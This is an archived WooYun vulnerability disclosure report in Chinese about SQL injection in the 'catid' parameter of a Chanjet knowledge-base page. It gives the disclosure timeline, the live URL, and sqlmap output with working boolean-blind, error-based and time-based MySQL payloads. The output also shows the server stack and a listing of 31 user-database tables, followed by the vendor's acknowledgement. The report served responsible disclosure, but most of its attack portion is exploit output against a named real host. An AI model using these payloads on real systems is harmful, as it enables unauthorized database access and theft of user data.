乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-08: 细节已通知厂商并且等待厂商处理中 2015-10-08: 厂商已经确认,细节仅向厂商公开 2015-10-18: 细节向核心白帽子及相关领域专家公开 2015-10-28: 细节向普通白帽子公开 2015-11-07: 细节向实习白帽子公开 2015-11-22: 细节向公众公开
http://zsk.chanjet.com/zice/index.php?content-app-category&catid=1 注入点:catid
sqlmap resumed the following injection point(s) from stored session:---Parameter: catid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: content-app-category&catid=1) AND 1999=1999 AND (5493=5493 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: content-app-category&catid=1) AND (SELECT 6262 FROM(SELECT COUNT(*),CONCAT(0x717a6b7171,(SELECT (ELT(6262=6262,1))),0x71717a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7485=7485 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: content-app-category&catid=1) AND (SELECT * FROM (SELECT(SLEEP(5)))Dbnl) AND (1947=1947---web server operating system: Windowsweb application technology: Apache 2.4.4, PHP 5.4.19back-end DBMS: MySQL 5.0Database: usercenter[31 tables]+-----------------------+| user_admins || user_applications || user_badwords || user_domains || user_failedlogins || user_feeds || user_friends || user_mailqueue || user_memberfields || user_members || user_mergemembers || user_newpm || user_notelist || user_pm_indexes || user_pm_lists || user_pm_members || user_pm_messages_0 || user_pm_messages_1 || user_pm_messages_2 || user_pm_messages_3 || user_pm_messages_4 || user_pm_messages_5 || user_pm_messages_6 || user_pm_messages_7 || user_pm_messages_8 || user_pm_messages_9 || user_protectedmembers || user_settings || user_sqlcache || user_tags || user_vars |+-----------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-08 15:26
感谢您对我们的关注和支持,该问题存在,我们正在修复。
暂无